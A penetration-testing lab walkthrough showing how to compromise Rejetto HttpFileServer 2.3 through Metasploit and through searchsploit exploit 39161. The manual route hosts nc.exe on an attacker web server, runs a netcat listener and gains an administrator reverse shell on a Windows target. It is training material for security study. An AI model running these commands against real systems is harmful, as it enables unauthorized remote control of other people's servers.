# HttpFileServer httpd 2.3(Rejetto)

## #Enumeration

```
nmap -sV -p 80 10.4.19.119
```

```
80/tcp open  http    HttpFileServer httpd 2.3
```

## #Exploitation

```
search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check other options, TARGETURI, Payload options, LHOST ,LPORT if necessary
exploit
```

<figure><img src="https://2323754756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqOzKV4VHdQXzOvQKF5XH%2Fuploads%2FdvkbNhBLzOqttP5NGyvq%2Fimage.png?alt=media&#x26;token=b237763c-9d02-4974-8356-ee02ade3a986" alt="" width="563"><figcaption></figcaption></figure>

After running this module you will get your meterpreter session

## #Manual Exploitation

```
nmap -sV 10.2.23.79
```

```
80/tcp    open  http               HttpFileServer httpd 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

* Use `searchsploit` to identify `HttpFileServer httpd 2.3` vulnerabilities

```
searchsploit HTTP File Server 2.3
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-6c4ba1c4ff580bb8a319f39572e9a43113289759%252Fimage-20230423132333200.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=3c27bd775477349ee7e31c53e8648564580a143fabe67c44f95b633b9cf0f9dd" alt=""><figcaption></figcaption></figure>

* Copy the exploit to the Desktop

```
cd Desktop/
searchsploit -m 39161
```

#### Analyzing the Exploit <a href="#analyzing-the-exploit" id="analyzing-the-exploit"></a>

```
vim 39161.py
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-4ee2cb99dc93186e03c6e15159878a8adb376094%252Fimage-20230423132623415.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=15190e632fc321542a90c8e08cc6b600951fadd5394d55ab255bd6426ec5c501" alt=""><figcaption></figcaption></figure>

* Read the exploit
  * *You need to be using a web server hosting netcat (http\://\<attackers\_ip>:80/nc.exe). You may need to run it multiple times for success!*
  * `ip_addr` - change to attacker Kali Linux IP
  * `local_port` - change to 1234

#### Execute the Exploit <a href="#execute-the-exploit" id="execute-the-exploit"></a>

* Save and run the exploit

```
# In a new terminal session
cd Desktop/
cp /usr/share/windows-resources/binaries/nc.exe .
python -m SimpleHTTPServer 80
```

```
# In a new terminal session
# Run the netcat listener on the exploit specified "local_port"
nc -nvlp 1234
```

```
# From the first terminal windows, run the exploit
python 39161.py 10.2.23.79 80
```

```
whoami
	win-omcnbkr66mn\administrator
systeminfo
```